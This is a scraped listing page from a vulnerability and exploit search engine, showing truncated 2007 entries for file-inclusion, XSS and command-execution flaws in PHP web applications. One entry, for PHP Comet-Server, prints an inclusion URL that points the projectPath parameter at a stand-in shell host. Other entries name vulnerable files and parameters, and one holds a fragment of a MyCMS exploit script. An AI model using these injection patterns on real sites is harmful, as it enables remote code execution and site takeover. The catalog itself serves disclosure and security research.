CVE Search Engine - Security Vulnerabilities and Exploits Search Tool

securityvulns•added 2007/07/11 12:0 a.m.•66 views

ISS Proventia Appliance multiple security vulnerabilities

SSH user accounts detection, crossite scripting, PHP include, protection bypass...

2.2AI score

Exploits0References1

Exploit DB•added 2007/07/11 12:0 a.m.•31 views

IBM Proventia Sensor Appliance - Multiple Input Validation Vulnerabilities

source: https://www.securityfocus.com/bid/24864/info The IBM Proventia Sensor Appliance is prone to multiple input-validation vulnerabilities, including multiple remote file-include issues and a cross-site scripting issue. An attacker can exploit these issues to steal cookie-based authentication...

canvas•added 2007/07/10 12:30 a.m.•30 views

Immunity Canvas: LIMESURVEY_INCLUDE

Name| limesurveyinclude ---|--- CVE| CVE-2007-3632 Exploit Pack| CANVAS Description| LimeSurvey Include Notes| CVSS: 6.8 Repeatability: Infinite VENDOR: Limesurvey.org CVE Url: https://vulners.com/cve/CVE-2007-3632 CVE Name: CVE-2007-3632...

6.8CVSS6.7AI score0.70471EPSS

securityvulns•added 2007/07/10 12:0 a.m.•41 views

PHP Comet-Server

Discovered by: MasTerX ---------------- Bug in : comet/example/gamedemo/inc.functions.php Vlu Code : include$projectPath."/inc.var.php"; http://site.com/path/example/gamedemo/inc.functions.php?projectPath=http://SHELLURL.COM?...

0.9AI score

Packet Storm•added 2007/07/10 12:0 a.m.•30 views

phpcomet-rfi.txt

Exploit DB•added 2007/07/09 12:0 a.m.•29 views

Systeme de vote pour site Web 1.0 - Multiple Remote File Inclusions

source: https://www.securityfocus.com/bid/25335/info 'Systeme de vote pour site Web' is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting these issues may allow an attacker to compromise the application and the underlyi...

Packet Storm•added 2007/07/07 12:0 a.m.•18 views

limesurvey-rfi.txt

Owner : Pr0T3cT10n Email : [email protected] Homepage : www.kamikaz-team.com Script site : www.limesurvey.org Script name : LimeSurvey PHPSurveyor Version : 1.49RC2 Type : RFIRemote File Include Source : http://sourceforge.net/project/showfiles.php?groupid=74605 D0rk : "You have not provided a...

Packet Storm•added 2007/07/07 12:0 a.m.•23 views

netflow-xss.txt

NetFlow Analizer 5 & OpManager 7 multiple XSS vendor url:http://www.adventnet.com/ advisore:http://lostmon.blogspot.com/2007/07/ netflow-analizer-5-opmanager-7-multiple.html vendor notify:yes exploits include:yes NetFlow Analizer and OpManager contains a flaw that allows a remote cross site...

seebug.org•added 2007/07/07 12:0 a.m.•25 views

LimeSurvey (PHPSurveyor) 1.49RC2 Remote File Inclusion Vulnerability

No description provided by source. Owner : Pr0T3cT10n Email : [email protected] Homepage : www.kamikaz-team.com Script site : www.limesurvey.org Script name : LimeSurvey PHPSurveyor Version : 1.49RC2 Type : RFIRemote File Include Source :...

7.1AI score

exploitpack•added 2007/07/05 12:0 a.m.•13 views

Maia Mailguard 1.0.2 - login.php Multiple Local File Inclusions

Maia Mailguard 1.0.2 - login.php Multiple Local File Inclusions source: https://www.securityfocus.com/bid/24770/info Maia Mailguard is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. Exploiting these issues may allow an unauthorized...

Prion•added 2007/07/04 3:30 p.m.•7 views

Improper access control

Liesbeth base CMS stores sensitive information under the web root with insufficient access control, which allows remote attackers to download an include file containing account credentials via a direct request for config.inc...

5CVSS6.9AI score0.07942EPSS

Exploits0References6

canvas•added 2007/07/03 6:30 p.m.•33 views

Immunity Canvas: SPHPELL_INCLUDE

Name| sphpellinclude ---|--- CVE| CVE-2007-3522 Exploit Pack| CANVAS Description| sPHPell Include Notes| CVSS: 6.8 Repeatability: Infinite VENDOR: sPHPell CVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3522 CVE Name: CVE-2007-3522...

6.8CVSS0.8AI score0.66255EPSS

Exploit DB•added 2007/07/03 12:0 a.m.•29 views

MyCMS 0.9.8 - Remote Command Execution (2)

!/usr/bin/php -q -d shortopentag=on Thanks to rgod for the php code and Marty for the Love "; if $argcNo new score set"; elseif $score $data $file1 = "snakescore.txt"; $file2 = "snakesetby.txt"; $file1h = fopen$file1, 'w' or die"can't open file"; $file2h = fopen$file2, 'w' or die"can't open file"...

seebug.org•added 2007/06/30 12:0 a.m.•10 views

Ripe Website Manager (CMS) <= 0.8.9 Remote File Inclusion Vulns

No description provided by source. Author:: BlackNDoor | [email protected] Homepage:: www.learntohell.net Script:: Ripe Wepsite Manager Version:: = v0.8.9 Type:: Remote File Include Source:: http://sourceforge.net/project/showfiles.php?groupid=194532 Bug:: - Files:...

7.1AI score

0day.today•added 2007/06/30 12:0 a.m.•18 views

Ripe Website Manager (CMS) <= 0.8.9 Remote File Inclusion Vulns

Exploit for unknown platform in category web applications =============================================================== Ripe Website Manager CMS Files: /admin/includes/authorpanelheader.php /admin/includes/adminheader.php - vulncode: Exploit:: http://www.site.com/path to...

7.1AI score

exploitpack•added 2007/06/30 12:0 a.m.•15 views

XCMS 1.1 - Galerie.php Local File Inclusion

XCMS 1.1 - Galerie.php Local File Inclusion Author:: BlackNDoor | [email protected] Homepage:: www.learntohell.net Script:: XCMS : CMS Version:: 1.1 Type:: Remote Directory Listing & Local File Include Source:: http://groupeclan.free.fr/XCMS.zip Bug:: - Files: /Module/Galerie.php.php -...

canvas•added 2007/06/27 12:30 a.m.•27 views

Immunity Canvas: DAGGER_INCLUDE

Name| daggerinclude ---|--- CVE| CVE-2007-3431 Exploit Pack| CANVAS Description| Dagger Include Notes| CVSS: 6.8 Repeatability: Infinite VENDOR: Dagger CVE Url: https://vulners.com/cve/CVE-2007-3431 CVE Name: CVE-2007-3431...

6.8CVSS6.7AI score0.8397EPSS

canvas•added 2007/06/26 5:30 p.m.•33 views

Immunity Canvas: B1GBB_INCLUDE

Name| b1gbbinclude ---|--- CVE| CVE-2007-3401 Exploit Pack| CANVAS Description| B1gBB Include Notes| CVSS: 7.5 Repeatability: Infinite VENDOR: b1gbb CVE Url: https://vulners.com/cve/CVE-2007-3401 CVE Name: CVE-2007-3401...

7.5CVSS6.8AI score0.84412EPSS

Packet Storm•added 2007/06/26 12:0 a.m.•24 views

sitedepth-lfi.txt

Sitedepth CMS 3.44 Local File Include LFI Exploit ! Application homepage : http://www.sitedepth.com/ ! Author : H4 / Team XPK ! Contact : [email protected] ! Bug discovered : 2006-11-07 ! Bug published : 2007-06-25 --------------------------------------------------------------------- Vuln. code:...